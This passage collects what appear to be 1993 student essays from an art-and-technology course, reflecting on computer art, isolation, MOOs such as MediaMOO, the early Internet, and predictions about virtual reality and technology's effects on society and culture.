a verb... the act +of doing it. After the doing part is done, what s left is a +fossil, a mere artifact of the real thing which is art. The +art-things sitting in galleries, on walls, piled up in basements +are records and interesting as records of the metamorphosis and +working out of a thought or feeling. + + Art is sometimes thought of as a didactic, instructive sort +of exercise; or, conversely purely decorative. These types of +art to me are dead, they leave no-where for the viewer to +exercise his or her own thought processes. + + The viewer is assumed to be in one of two states, with it +or not with it. In it or out of it. Hip or square. If privy to +the current presumed cutting edge theme being presented by this +instructive art, the viewer can nod sagely and agree; if not +connected to the same stream of thought, there is room for +instruction. This is claustrophobic and limiting, it stagnates +and is retentive. + + At this point I have a sneaking suspicion that much of the +art making using computer technology is of this sort, a parading +of technique, a bragging and telling how the look of reality can +be changed. This has a tendency to dazzle and dictate a certain +look , this kind of rigid template is an open invitation to the +avant-garde, the art pirates, the art-hacker. + + + "The stimuli of the modern world, sounds and sights are +reproduced and distributed through endless systems of linear +technology. (The more intimate senses were long ago excluded +from this order.) Stereo and video are recorded onto tape, that +opaque blackish substance that symbolizes the intransigent, +incomprehensible linear time of this universe. Computers and +record players use flat disks whose spiral roadways reflect the +circularity of their contents. All visual and aural +information¥speech over the telephone, the television picture, +computer data¥is encoded into lines of electronic information. +The linear becomes language. The arcane discipline of electronic +circulation now guards the gates of the senses. + The proliferation of the computer is the development that +most insures the closure of this system.. In the computer, we see +physically affirmed, as if by an independent source, all the +assumptions of linear thought. Conversely, the computer ignores +all utterances not made according to the rules of its own linear +code. With the advent of private computer use, the computer +becomes an oracle of instruction in the structures of the linear. +It gives instruction in how t write and how to conduct +business¥but according to its own linear rules. It is even +deployed to indoctrinate children into the ways of the linear. +Further, as greater and greater amounts of society s information +(both financial and intellectual) are stored in computers, even +the reluctant are coerced into dealing with the computer and its +pattern of thought." + +Peter Halley, On Line New Observations, no. 35 (1985). +Blasted Allegories; 1987. The New Museum of Contemporary Art and +Massachusetts Institute of Technology. + + + Virtual reality moves art and art making into a realm of +endless possibility. Freed from the confines of a small screen, +this new dimension, for me is so broad it is almost impossible to +speak of. Sculpture you can crawl into, ride, even travel through +for what seems like miles, interactive installations. Perhaps +this is the new direction in art we were waiting for. This will +influence, and enrich the traditional art practices as well as +consumerism in society--art and consumerism--a well known couple +about town. + + The credibility of that which is seen on a screen (which, +to most people is accepted as the truth) can be used to +manipulate and fool the viewer. This is not a bad thing, a +touch of healthy suspicion would be a welcome attribute in the +general public. + + + +PIMPING THE REALITY PRINCIPLE -MONDO MAG (1993) + Angry, disillusioned and media-savvy, the newly discovered +twenty-something generation is shaping up to a very hard sell. +¥Debra Goldman, ADWEEK + Belief in advertising is not like breathing. It doesn t come +naturally; it must be taught. +¥Edwin L. Artzt, Proctor & Gamble CEO + It s got to be real. +¥Levi s 501 jeans, advertisement + + + + + +And then there is the ephemeral, the part of art that comes when +you least expect it. + + Some things we plan. + We sit and we invent + and we plot and cook up + Others are works of inspiration + Of poetry + + And it was this genius hand + That pushed me up the hotel stairs + To say my last good-bye. + + + + ((DEBBIES ASIDE: (private thoughts on the act of communal +art on three screens at a time) + + Although its hard for me to communicate verbally vocally, +easier if writing + + taking turns-- quick repartee isn t my bag. + + interesting to communicate well, more efficient felt like we +were in touch-)) + ....huh?..... + + + + + On a more practical note, the strongest impression I' m left +with from taking this course is the feeling of entry into the +rest of the world. + + Especially here in Victoria, I've felt isolated, and +increasingly so the longer I m here and the more time I spend at +school. In the past I ve always been able to take off for jaunts +into the states, around Canada or Mexico, but in the last few +years I have lead an increasingly parochial life. It was a thing +I feared right from the first when I moved here, and then it came +true. +I' m sure this sense of isolation is not my very own domain, +isolation is a major theme of our society at this point and it is +my belief that technology in all its myriad forms has contributed +to this. The ability to lead a completely vicarious life, +containing excitement beyond the potential of most people, is +available to anyone with a television, VCR, six-pack and a couple +of joints. +(oh ya, a video..fantasy of choice) + + This isolation is endemic. The T.V. screen which lives in +almost every home is a constant friend, requiring no effort, +seemingly giving companionship and in reality taking away the +ability to enjoy real personal contact. As well, a study has +shown persons who watch a "normal" amount of television suffer +from lack of REM sleep time, in other words, they don't dream. +Dreaming is a necessary part of a healthy life and the loss of +this ability must have a severe, though perhaps subtle effect on +the person. + + In contrast with my first thoughts of the virtual meeting +places as making yet another barrier between people, (much like +television, probably because they re both boxes that plug into +the wall), I see them now as a link, a possible tool for fusion, +although far from perfect, especially in that it precludes a vast +amount of people from becoming part of this new community for +economic reasons. I would like to think that with the growing +availability of the Internet, email and other network +communication systems, the unity that is created by the exchange +of thoughts and feelings will provide a humanitarian spring-board +and with the growing communication between people all over the +world (I can hear music surging in the background...I d like to +buy the world a coke...lalala) perhaps a true global +consciousness will arise. Or the consciousness already in place +will become more compassionate through increased knowledge and +familiarity. Art will fit in there (does already), a picture is +worth a thousand words...and takes up a lot more space... + + + The ability to have free, almost immediate communication +with people who are far away is extremely satisfying. + + + + The level playing field of electronic communication on +Internet is seductive. I, and most people, don't reveal +gender, age, race, social standing while having these exchanges +and it is not necessary. This has got to be a good thing. + + The downside of this connection is the potentially +intrusive nature of the electronic net, a net we could all be +caught in like little smelts with credit cards, Until the end of +the World explored both these aspects fully, the connection kept +people in close contact if they so desired and made it very hard +to hide. + + Back to my personal story. A testimonial. Dredged in +isolation (and I mean dredging in the culinary sense, the way +your mother used to dredge chicken pieces in flour and spices +before frying) I of course turned to the television and began one +of those marathon, epic debaucheries of avoidance. Well, I was +dragged from my reverie of watching the passive screen to the +more engaging activity of watching the computer screen, ah....a +screen that talks back. I m not exaggerating when I say I miss +the computer room during the weekends. + + For me, with my limited resources, the computer works best +for communication purposes, text, at this point is the medium of +choice. + + Computer art is verbal art right now. Making traditional art +is, to me, usually a pretty solitary activity. It is also a +physical one, I enjoy the feel of the materials, the smell, being +able to hold the art, move it around. Because I use my senses, +it is sensual. Because it is sensual, there is also a realm of +sexuality. The move from three dimensional art to trying to make +something that I could call art, on a screen, that I couldn t +touch or change the shape of unless I kept within the limited +dimensions, was frustrating to say the least. Perhaps, now that +the form is not so foreign to me and I have a real desire to see +what I can do with this thing, and more time; I ll be able to +explore the visual aspects more fully. This is only the +beginning. + + There is no conclusion. My world has been made larger. I have +barely experienced an introduction to this new art tool. I m +hooked. + + +---------------------------------------------------------------- + + +***************************************************************** +*************** +(These are the incoherant rantings of a young man driven over the +edge by a + word processing program. Please proceed with caution.) +***************************************************************** +*************** + + + + + + + + + + + + WordPerfect ate my essay, and my brain + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Neil Barman + 9106988 + FA345 + Brad Brace + June 18, 1993 + + + + The last time I spent a serious duration in front of a +computer was in grade six. I was twelve years old and the +elementary school I attended had purchased four Apple II's. With +so few computers at their disposal they were forced to choose an +elite group of students who would be privileged enough have +access to the new technology. I was chosen to be among the +"lucky" ones. + We set out with task of learning Basic. I quickly learned +how to write a program that would spew an annoying pattern of +numbers +down the screen. I also learned how to do math equations on the +computer, but I already had a calculator that made quick work of +those and fit in my pocket too. We were given almost no guidance +mainly due to the fact that there was none to be given. Nobody +really knew very much about computers, with a few exceptions. + Two young brainiacs named Adrian Evans and David Burridge +knew what they were doing. They had computers at home, the very +same ones that were at school. They wrote cute little programs +that would do this or that. Programs so inconsequential I can't +even remember them now. But they knew how to do it. They also +made it their business to remind me that I did not know what I +was doing. They would talk computer lingo and laugh at how +perplexed I would get. They would point and whisper and giggle as +I would try to explain to the teacher why I was so confused. I +had no clue why we were doing what we were doing. I was given no +assistance in that department. The "computer education" program +continued and I continued to be bewildered. + Basically Adrian and David were geeks flaunting their +computer literacy. I knew that and I tried not to let their +intimidation get to me. It did in any case. I opted out of the +computing program. I figured they were far more trouble than they +were worth. I avoided them like the plague. + Ten years later, I have decided to re-acquaint myself with +the machine called computer. A class called "Art and Technology: +Art in the Age of Digital Reproduction" seemed like it would be +a good start since I already have a pretty good grasp of the art +part. Combining art with computer technology sounded like a +fascinating progression. Since I make art, I was curious as to +how I could use computers in my art-making process. As it turns +out, the software that is available right now is of almost no +use to me. While it can be enjoyable and amusing to manipulate +photographs and paint on electronic canvases, it still seems like +it's more trouble than it's worth. I have been told, however, +that these boxes come in handy. + The work that I am doing at present, which is mostly +photography, has too much basis in reality. It is about the way +we live. It is about the way we build and develop the areas where +we live and how we make those places as ours. It is about many +aspects of being a person. I have not found a way for the +software to provide me with any assistance. I work with other +peoples' senses of self and creativity. While someone is probably +writing a program that will simulate these things, I'm not +interested. I thrive on interaction with real people, they never +cease to amaze me. + While computer software itself has not provided me with +inspiration, the Internet has. At first what felt like a mystical +society of computers around the globe is now a different +dimension of worldly consciousness. Quantum mechanics is busy +trying to prove the existence of alternate dimensions; I've been +exploring one for the last eight weeks. It is the dimension of +information and communication. + It seemed like an incredibly difficult task at first, much +like learning Basic when I was in grade six. This time however +there were no computer geeks around to hamper the learning +process. I was all on my own. With only a guide book to chart my +course I have been able to "go" all around the world. I have +gained access to a seemingly endless supply of information. Text +is definitely the most powerful medium here. I have found other +forms of information, sound and images for example, but text is +the only one that has been able to feed me satisfactorily in this +dimension. Text has given me the knowledge to explore further. +With more exploration comes more text, comes more knowledge... +This may not seem like a breakthrough discovery to most, but it +was to me. The text not only pushes me in new directions around +the Internet, it has charged my imagination. I am fascinated with +the possibilities of this new dimension. + I have been able to converse with people all over the world. + +The very same people I would love to interact with in person but +am unable to because of distance. Connectivity over the Net has +been the next best thing I suppose, but it is a far cry from the +real interaction that fuels my art. I have found it intriguing to +no end but it hasn't given me anything. Yet. I expect that +communication on the Internet will be very much like regular +social interactions people have nowadays. You go to places you +like. You avoid other places. You meet many people. You keep in +touch with a few. Friendships grow and you learn from each other. +The thing that has been somewhat of a shock has been the +relearning, from scratch, of all things dealing with social +interaction. You must relearn the processes of travel and +conversation. There is no bus route for the Internet and you +can't laugh out loud. + The arena of the MOO seems to provide a bridge between +reality and Jaron Lanier's vision of VR and communication as one. +Though they are only text-based at the moment they are headed in +the right direction. Their possibilities for character +interaction extend only as far as they can be programmed. In +addition to this, if you want to see how you interact with +another character, you must visualize it in your head. The same +goes for sounds and smells. The ideal vision of VR has all +sensory inputs virtualized. I would probably be an excellent +guinea pig for a perfectionistic VR developer. You see, I suffer +(or , as I like to think, am privileged to suffer) from a +condition I call hyper-awareness. Anything and everything my five +senses can take in they do. This is usually a pleasing +substitute for the drugs I've never done though overloads do +happen. It can make driving a little difficult. I find the Moo's +acceptable, but not enough to tweak my senses, which enjoy +reality far too much. + On the flipside of that argument is that Moo's, in +particular MediaMOO at MIT, have provided me with some +interesting insights into how people develop and personalize +their own space when it can be absolutely any space at all. You +can make anything and set it so it can be manipulated in any way +you choose. Most of the stuff I've "seen" has been pretty +imaginative. The major limitation of creating your own +environment in a MOO is that other characters can only perceive +it one way, the way you describe it. Something is lost when you +are not able to explore a locale with your five senses. It is +something that is not actually a sensory input. It is more of a +feeling you get about the person whose space you are in. The +sterility of the MOO keeps you from feeling this. It is pretty +difficult to get in a position in the MOO where you feel +genuinely uncomfortable. It's a feeling like this that makes you +act truly human. Without it, and others, social interaction feels +a bit too artificial. With all this talk about feeling I +beginning to think that I'm missing the point. + If you've noticed traces of pessimism, sarcasm, and +cynicism, you're probably reading this properly. These natural +characteristics of my personality, coupled with my desire for +real experiences and my general dislike of things convenient, +leave me still wondering the same thing I wanted know in grade +six: what is all the hype about? + It seems that almost every household has a computer. I am +constantly hearing how you must be computer literate in order to +succeed get a job nowadays. Many people are storing all their +vital information on disk. Even in this class, so many people +appear to be engrossed with learning how to use the available +software. It seems awfully limiting. Am I missing something? Is +there something advantageous about having your job, your home, +your self, hang in the magnetic balance? + Computer-dependant people have perhaps conveniently +forgotten that computers need electricity. Again, not a +monumental revelation, but few seem to acknowledge this fact. It +makes me think of one of the many power failures that used to +occur during summer rainstorms as when I was younger. People +would gather at some spot on the street, sheltered by umbrellas, +and chat. My mother once told one of the neighbour kids that +since the power h ad gone out we'd have to watch television in +the dark. He bought it. People are just as gullible when it comes +to computers. Computers also "crash" (a mysterious phenomenon +that I have been reminded of thrice during the writing if this +essay). Rarely does anybody have a solution, let alone an +explanation for this. I can't understand how people can rely so +much on such fragile pieces of equipment. + After so much griping about these annoying boxes I'd better +reveal my admiration of them. As I have already stated, I think +the ability to communicate with them is invaluable. Having a +computer in every household for that reason alone would be worth +it. Anyone has the capability to access almost anything from +anywhere. Those are pretty huge parameters that have never been +within our reach before. People talk of a restructuring of the +Internet whereby more restrictions would be in place. +Unfortunately, due to human nature, we will probably work to +justify a situation like that. Greed will more likely than not +drive people to lock up information, with access for a price. +Hackers will continue to hack but the stakes will be higher. The +authorities will crack down harder on those who are caught. Those +in the upper echelons of government know that information is +power, and they're not about to give it up that easily. The EFF +will hopefully grow and continue to prosper. + I have been amazed by what computers can do. My aspirations +for putting out my own publication will be realized shortly. +While you'd never be able to tell by the appearance of this piece +of writing, I am eager to tap the dynamics of the realm of +desktop publishing. Even more than I imagined, I will be able to +distribute it world-wide if I so choose. I will be able to design +my own home, with plans ready to hand to the builders. These are +things I had not imagined possible before. I don't suppose Adrian +and David would be too impressed. So what. + I have been feeling quite uncomfortable trying to come up +with "original insight and speculation on contemporary culture +and technology." I have such little experience with this field +that any attempts to theorize so far have ended up with +technologically aware people either stating that it's been done +or questioning why I would want do such a ridiculous thing. It +has made me feel like I'm too creative to be working on a +computer. Either that or I'm being too demanding. I don't have +the technical know-how to recognize which it is yet. + This planet definitely needs more communication. The +Internet has made it so that you reach around the world, but not +everywhere. +As far as I know of there are no connections to the third world. +For the most part the technology is only available to big +businesses and universities. According to Molly, a character in +MediaMOO, that would mean that this kind of technology is limited +to an elitist group of people with enough money to gain access to +the resources. The uneducated, unwashed masses are deprived of +the opportunity to be connected. I can believe it. We are going +to have to find a way to hook up the rest of the world. Without +it, the third world might slip further into the information void. + "I have found computers provide a pretty good workout for +the modern mind. The possibilities of computing have been able to +stretch the imagination of some. Never before would you have been +able to manipulate a photograph or a rendered 3D object in the +ways you can now. You can publish yourself. While it is still +somewhat expensive to accomplish these things, it is no longer +absolute impossible. With the added potential of computers you +can let your imagination explore larger expanses. Getting things +done is now only a matter of learning how to do it, and even that +is easier than ever!" + ... + I still don't buy it. + Reality is far too valuable for me to give up. I love my +cat. I love Italian food. I love my Polaroid camera. I like to +feel fear. I drive my car fast any chance I get. I have almost +drowned in snow. Standing on the edge of the roof of my apartment +gives me a rush. There is no virtual adrenalin. I play basketball +on the weekend with a bunch of very large guys who hit hard. +Bruising is an essential part of being alive. + I have memories of growing up. Barbecues in the back yard. +Riding my bike up and down the block. Neighbours. Getting chased +by the bully. Going on vacation. Swimming at the local pool. +Stuffed animals. I don't think virtual sentiment would cut it. +The terrible feeling inside when you smoke your first cigarette. + The experiences of my life have shaped me and will continue +to do so forever. I can't help but get the feeling that +technology is being shoved down our throats. I thought this time +I might be able to keep myself from gagging on it but i haven't +been successful so far. AT&T is trying to convince me that I +won't need a road map anymore. Their advancements will get me to +my destination quickly, safely, and efficiently, and when I get +there I can call my wife over a video-phone. They're trying to +make physical distances non-existent by transporting my presence +around through a sterilizing filter. I'll pass on it, thanks. It +all just seems too safe. + + I have not been able to make up my mind for the last seven +pages. I have reacquainted myself with the best technology +available to me. I have explored more of the Internet than most +people I know. I have learned how to do many things with these +fancy boxes. I know what I can do. I still want to know why. At +least this time I am able to make an informed choice about my +future in computing. It is very likely that six months from now +my opinion will have changed. Nobody is going to know anyway. + + +---------------------------------------------------------------- + + +by: James Nobel + +INTRODUCTION + +Since the beginning of mankind, inventions were the fundamental +backbone of progression into what laid ahead. The telephone and +television are among the most influential inventions that +propelled mankind into boundless territories. Here, +communication is the intangible force that governs the world s +fate, we now live in. If it wasn t for the telephone and +president Kennedy s tactics we wouldn t be here: the Cuban crisis +would have been a reality. Now, considering this critical event +that would have seriously dictated the future of civilization, +how else will technology affect us? Our lives will be changed +for the better or the worse by technologically advanced tools and +multimedia; in conjunction, the future of our society and culture +will adjust and adapt as we progress into what may be the +information age or the post-industrial age. A passage by Kurt +Yonnegut captures the very essence of what we are to expect with +regard to technological advancements: + + . . . the First Industrial Revolution devalued muscle work, then +the second one devalued routine mental work. . . + + Do you suppose there ll be a Third Industrial Revolution? + + A third one? What would that be like? + + I don t know exactly. The first and second ones must have been +sort of inconceivable at one time. + + . . . I guess the third one s been going on for some time, if +you mean thinking machines. That would be the third revolution, +I guess - machines that devaluate human thinking. + +(Smart, opening page) + +Although this passage makes reference to artificial intelligence, +it gives us an idea of how fast technology is progressing and the +ramifications of such progression. Can you image machines that +devaluate human thinking? Our imagination would lead us to many +predictions on future society and culture. Essentially, +technology is the impetus for the fate of our future. In order +to instigate some thought and provide some insight, this essay +will reveal the potential capabilities of contemporary technology +and the effects it will have on modern society and culture. + + +MODERN SOCIETY + +Communication and information are virtually the vital blood and +heartbeat keeping society alive and healthy. Because of +technological improvement, the way in which we communicate has +become diverse and complex (Multimedia), diverting from +conventional forms. New technology provides capabilities to be +done differently, efficiently, and more conveniently. In +essence, convenience and efficiency are the driving force for +modern technology, without them civilization would remain +stagnant or dormant, which ever way you look at it. If not for +convenience, cellular phones would be obsolete and there would be +no drive for the invention of a wristwatch sized pagers. If not +for efficiency there would be no need for software programs such +as CADs and the digital form of communication, Email. +Convenience and efficiency complement each other, and together +are the essential ingredients for technological growth. + +With respect to the affects of technology on society, we have +experienced what has already happened and the many researches +that had been done. Consequently, there could be a trend that +will provide invaluable clues to the future. Eventually we are +and will be affected by modern technology and notice changes in +our education system, government, profession, and business. New +information and communications technologies are spreading rapidly +throughout the world at an increasing pace. Someday, we will be +able to remain in one central location and complete all daily +tasks without coming in physical contact with another person. +Sports and leisure activities will be the only factor motivating +the movement of our body. People may turn into a bunch of couch +potatoes taking for granted the convenience of what technology +has to offer: already, interactive TV programs are enabling one +to order pizza from a simple command on a remote control. +Additionally, information is as easy to access as searching for a +book in a library, may be even easier. There are databases +everywhere that can be accessed by the public. For example, +there is a BC computer guide listing programs and services +offered by the provincial government. The convenience of +acquiring information by means of information highways precludes +the hassles of fiddling through a phone book and calling place +after place to access your target. Moreover, telecommunication +is augmenting the elimination of office as the workplace. People +will be able to conduct daily work activities without leaving the +home. Consequently, the environment we live in may benefit from +less air pollution caused by excessive automobile exhaust and +population of the city core. Economically, the decreased demand +for downtown office space will drive the rent/lease prices down, +thus, permitting affordable prices for people wishing to live in +the downtown area. To conclude, there seems to be many +advantages of convenience, however, may be in the future this +world we live on will be inhabited by slothful but highly +intelligent human beings. + +Currently, information is without question equivalent to power +that can be shared freely by all. Some people acquire +information which is related to the struggle for the competitive +edge, especially in business. Professions will fight for the +valuable commodity (information) that will keep them ahead of the +rest of the pact. An academic researcher needs information to +solve problems and create theories that will undoubtedly keep +him/herself ahead of the field in his/her discipline. Even +artists, fashion designers will be affected. By the nature of +their industry, replication is rampant, to a certain degree, and +will burgeon if information is easily accessible. If that s the +case artists will lose their authenticity, however, due to +serendipity and creativity, they may gain new ideas and designs +to enhance their respective disciplines. + +Presently we can access and deliver information millions of miles +away on the other side of the world. This was unfathomable years +ago, but in the age of the INTERNET information is going to be +the blood allowing the body of society to function smoothly. +Without this communication network we may be thrown back into the +days of civilization where mediums facilitating communication +were non-existent. Information and communication will be so +immense that society may form into a single entity, a global +community. Although this is a broad view there may be a +rudimentary integration of a global society. For instance, +automatic translation of different languages for users of the +INTERNET. A Canadian researcher communicating in English may +deliver messages instantaneously translated into Chinese for a +Chinese scientist. + +In the INERNET era, information highways are the driving force +eliminating the need for paper as medium for communication. +Digitized text reinforces and supports the move for a paperless +environment. Digital text is eternal and immortal, stored in +electronic facilities, whereas paper is mortal and indefinite +with a simple force of a hand or water. Without a doubt, the +strengths of information highways as communication mediums will +put smiles on the members and proponents of the environment +movement. Consequently, typing will become a mandatory +prerequisite implemented in our education system. That is until +thoughts can be entered into a computer through voice activation. +Unfortunately (or to some - fortunately), the paperless +environment is presently not a reality and will take years for it +to become a part of society. Despite the exponential growth of +the INTERNET and computers entering more homes, not every man +and women has access to computers and this communication medium. +Additionally the 100% safeguard of computer storage is not +guaranteed (because of computer viruses and the like), thus +furthering the acceptance of a paperless environment. With +regard to mail, the Email system will definitely flourish. +Sending messages so easily and quickly will make writing letters +more enjoyable. May be future post offices will integrate the +Email system in their organization. Individual booths will have +voice or hand activated input devices that delivers any where and +place in the world at a cost comparable to a postage stamp. +Where ever the Email system will be located, the +telecommunications industry will probably be the main and most +important industry of the future. This industry will provide +jobs, compensating for the lost occupations that were replaced by +computers and robotics. + +In the education system today, computers are becoming more +prevalent. Children are using it at a younger age, starting in +elementary schools. By this integration of digital technology +into our schools, children might grow lacking interpersonal +skills and a social life. This statement is generalized, but +Darwin s theory of evolution may support the truth. As years +pass by children will lose touch of reality. Communicating +through the INTERNET with someone without physical contact will +deprive them of the experiences and feeling from conversing with +a person face-to-face. Additionally, the large world we live on +will be mentally visualized as a small world, more intense than +we currently imagine. Conversely, there are a lot of positive +outcomes from modern technology in schools. The INTERNET will +facilitate and enhance knowledge, and provoke healthy +imagination. If children read text sent to them through the +INTERNET, imagination will flourish as they try to grasp the +meaning of the text and the person they are communicating with. + +In medicine and academic research, information technology can be +very beneficial and advantageous. Researchers can congregate via +computer networks (such as MediaMoo or other MUDs) facilitating +the possibilities of cures for the earth s illnesses and human +diseases. With the use of computers and network, doctors and +researchers will be able to work together and tackle the world s +problems. Moreover, sociologists can record, observe, and study +dialogue from players in a text form of Virtual Reality +(communication networks), allowing the fabrication of invaluable +conclusions and theories. For biologists, computers can produce +artificial life. Computer generated living beings live and +reproduce much like their biological counterparts. This +breakthrough will most definitely impact further studies into +reproduction of, for example, micro organisms that are the +foundation for living forms. Simulating biological growth can +give scientists the observational advantage without the lengthy +task of observing the real life growth stages. + +The all too familiar human occupation loss from computer +capabilities is more pervasive as the years go by. We have +already experienced the impact of Robotics in the work place and +due to the growth of the INTERNET and VIRTUAL REALITY computer +substitutable occupations will be diminishing. Operators and +information servers are the unfortunate victims of this +technological take-over. Conversely, new occupations may result +from such take-overs. Additionally, because of advanced +softwares and artificial intelligence, modern architects (for +example) have evolved from its true origin. Now the most +strenuous part of their job is to problem solve and design while +the once arduous task of utilizing their drafting and drawing +skills are now obsolete. CADs and the more advanced programs +have most definitely made an impact in this industry, whether its +positive or negative. Researcher have predicted that in the +future occupations will all be replaced or affected by computers, +except for artists, writers, and lawyers. Well, that statement +can now be modified to ALL professions will either be replaced or +affected by technological advancements. Artists facing digital +reproduction of their artwork may encounter appreciation in their +work, to a certain degree. Greater exposure and dissemination of +their artwork will frankly improve advertisement of their +original work, thus creating greater demand and marketability. +This of course is not applicable to every artwork; nevertheless, +it will impact every artist, especially the well-known or +avant-gardes of the art world. Additionally, writers and lawyers +will inevitably be affected by the immense amount of information +floating around in the vast array of networks. A lawyer may win +a case solely because of information he gathered as evidence that +was diligently extracted from a database in another city or +country. + +A technological breakthrough that will literally change and rock +contemporary society is VIRTUAL REALITY (VR). If this technology +had photo images in 3D and normal motion speed, there is +practically nothing it can t do. Presently, among others, it is +used in medicine, military, education, training, entertainment, +and research. The potential for VR is enormous. While donning a +mask and wearing a sensitized glove (who knows what other +attachment will be available) one may accomplish tasks before +physically impossible. Essentially, the use of this technology +is without limits. One can think of many ways of concocting a +purpose or objective for VR: simulating warfare for fighter +pilots and soldiers is one assignment VR has accomplished. The +more interesting capabilities of VR is what it will be able to +do, not what it has done. Imagine communicating with a friend on +the other side of the world as though he/she was there in front +of you. Images and sounds just like the real thing will fool +the mind and give humans the ability to do almost anything +without the presence of physical contact. A fencer under VR will +visualize a stab wound (hypothetically speaking) without sensing +physical pain throughout his/her body. Slam dunking like Michael +Jordan without even leaving the ground. Unfortunately there is a +dark side to VR and that is of satisfying our minds. It could be +addictive, comparable to psychedelic drugs that fool our minds in +accomplishing impossible feats. The illusions of the VR may have +psychological effects that may be comparable to the +hallucinogenic narcotics available in the market. People will +live and breath this artificial world of the VR. The effects +could be detrimental but for its present use the VR is beneficial +to society as it trains, educates, facilitates. Additionally, VR +can assist advertising and marketing tactics. Business can use +this medium to introduce new products which will attract +customers, and enable penetration and acquisition of a +substantial market. This would most definitely be a competitive +advantage for the user. + +VR may direct the future of a city s infrastructure. For +example, VR could someday be seen in shopping malls. +Merchandising stores will be the size of a information center +booth with VR equipment and attachments. Inside the VR world +would be a store salesperson or assistant. One will be able to +virtually shop inside a digitally reproduced environment of a +store. Prior to entering this digital store, the size of ones +body will be programmed to enable one to virtually try on a piece +of desired clothing. Then, ones appearance will be viewed in a +virtual mirror. When one chooses to buy an item he/she will +purchase it by conventional means, and receive it where it was +stored in a compact department behind the storefront (booth). If +VR is used along these lines, society will benefit with fewer use +for land and space. May be the environment can be saved from +this idea (if it hasn t already been thought of). With +increasing population, the infrastructure of a city would be +maximized to civilian comforts without building outwards, +possibly destroying the environment and pristine wilderness +areas. Basically, land and space will be used more efficiently +and effectively, and materials would not be wasted. + +Along with the advanced technological capabilities of VR and +other instruments, the political system may change drastically, +for the better or worse. With the acceptance of the INTERNET in +the Clinton administration, citizens will be able to voice their +opinions, feelings, and ideas about contemporary issues and +problems. This will enable the Clinton administration to view +the whole picture of a controversial issue which provides the +creation of quality decisions. On the contrary , countries under +a fascist government will experience greater control and order by +the dictator. With current and future information technology, +dictators will be able to monitor and record the lives of the +people. May be George Orwell s fictitious character Big Brother +will become reality. Some believe this character already exists. + + +MODERN CULTURE + +Society is built on many blocks, and no block is more celebrated +than that of culture. Culture is what distinguishes us from +people of other nations, and because of escalating growth of +global interconnection different cultures will be subject to +integration. Although a lengthy process, the transition is +exemplified in the global economic system: European Economic +Community (EEC) and the imminent North American Free Trade +Agreement (NAFTA) are just simple examples of the movement +towards global integration (hereinafter global integration is the +cohesion of information from all the countries of the world). In +the age where technology is fostering the construction of a +global village, how is the arts (the groundwork of culture) and +the artists going to be affected? Currently, how have they been +affected? + +Integration of the arts, which comprise of the theatrical, +musical, and visual arts, are happening already. Technology has +enabled people of different cultures and languages to communicate +with each other. Words in Japanese is currently translated into +English in the matter of seconds by the tap of a finger. Voice +activated language translation already exists, furthering the +possibilities of global integration. Considering global +integration, what will be the dominant culture adapted by all? +A trend that seems to be occurring rapidly gives rise to an +answer: the country with contemporary technology and culture +that will attract others. An example is the youth culture in +Japan and many other Asian countries who are riding the wave of +the American youth culture. They listen to the same music; +admire the same visual artists, musicians, actors/actresses, and +athletes; play the same sports (except for SUMO); and, eat the +same food as the Americans, all possible because of the +technological multimedia available to them. The powerful +Americans not only influence its immediate neighbors but also +overseas countries. + +As technology develops, so does the arts. Amid the presence of +the INTERNET, artwork will be dispersed all over the world for +viewing by anyone who possesses the necessary instruments. As +deliverance and receipt of artwork becomes easier, the downsides +of replication (as already mentioned) are likely to be more +prevalent. On the contrary, greater dissemination will enable +the invention of new ideas and thoughts from a compilation, +acquired through various computer networks. A simple example is +native art. Due to the vast amount of information available, +native artists have produced new styles and forms of art through +generations. A native artwork is printed with colors never used +in traditional forms. Technique and use of tools for carving +wood and metal have enhanced and elevated native artwork. +Presently, native art is internationally recognized and cherished +by many. The ideas may have been brought about independently, +however, the probability of acquiring new materials and +techniques from outside sources are immense. Additionally, +contemporary artists benefit from information that can, through +human ingenuity, create new techniques, skills, and forms of art. + + +Manipulation and digital production of visual artwork provides +efficient and convenient processes of creating art. Art +connoisseurs and enthusiasts may repudiate the nature and +originality of digitally produced artwork. This view is +reinforced by W. Benjamin: + + With the advent of process forms of reproduction, technique of +enlargement and slow motion begin to reveal aspects and images of +the original which escape unaided or natural vision. In +addition such processes of reproduction transform the contexts of +appreciation, reception and use of the original through the +provision of copies which enter spaces and situations beyond +the reach of the original. (Smart, p.112) + +Additionally, he argues that such developments have interfered +with the + authenticity of the object and that in the age of mechanical +reproduction. . . . the aura of the work of art withers. (Smart, +p.112). Nevertheless, the few that may support this view must +realize the evolution of the mediums of visual communication. +Art was produced and expressed on wood and stone in the days of +the Neanderthal and Cro-magnon man; then, artwork was expressed +on paper; consequently, photography replaced the artistic +functions of the hand; currently, artistic expression is found on +the computer screen. If one accepts this view, digitally +contrived artwork will be considered an authentic and unique form +of art. + +Amid the controversies on the amalgamation of artwork and +technology, artists (the creators and founders of cultural +characteristics) face extinction (in reality --- layoffs or fewer +jobs). With the softwares (i.e. MacDraw) available in the +market, artists are overwhelmed by the capabilities and functions +of computer assisted production of design and music. The +efficiency of these software packages are creating the +elimination of artist and their conventional skills and +techniques. Artists of the 90s and the future will probably need +computer literacy and utilization techniques as replacement for +their original skills (of using chalk, paint, pen, etc.). If +this is the case, who is the real/true artist the computer or +person? In light of what may happen to artists, art may be +negatively affected by mass production and dissemination. A +piece of artwork may devalue in the mind of a viewer because of +overexposure. Much like the people who get sick and tired of the +same music played on a particular radio station: our minds simply +turn off when their is repetition. By the year 2010, the term +original piece of artwork may signify the original millionth +piece of artwork. + + +CONCLUSION + +Currently the effects of technology is apparent to all of us; +however, in the age where full-blown cyberculture is not far off +in the future, we face a great deal of uncertainty and +vulnerability from what technology will offer. We could be +living beings existing mentally only in a digital environment +(i.e. in a MediaMoo). More frightening, we are unsure about the +actual capabilities of technology in the future. Imagine what it +would be like to live on a world where communication is +accomplished through wires connected to the brains of +participating individuals from a central computing unit. Wim +Wender s film, Until The End of the World gave us a visual +interpretation of the physical instruments necessary for entering +digital information directly into the human brain; this would +enable the phenomenon of telepathy into a virtual reality. The +use for this fictitious instrument would be endless (e.g. +eyesight for the blind) and the consequences would probably turn +contemporary society and culture five hundred and forty degrees. +Additionally, it would either astonish or scare the shit out of +modern man and woman. + +We can predict the ramification of technology on the future of +our society and culture, however, those prediction will never be +known to actually occur. Our future is like a biological entity, +no empirical data or past trends can forecast what is the fate of +mankind. Not only do we as individuals live, so does the +society and culture. We are the blood cells that circulate +through the veins of society and culture. Technology is the +medicine or illness that will permeate the 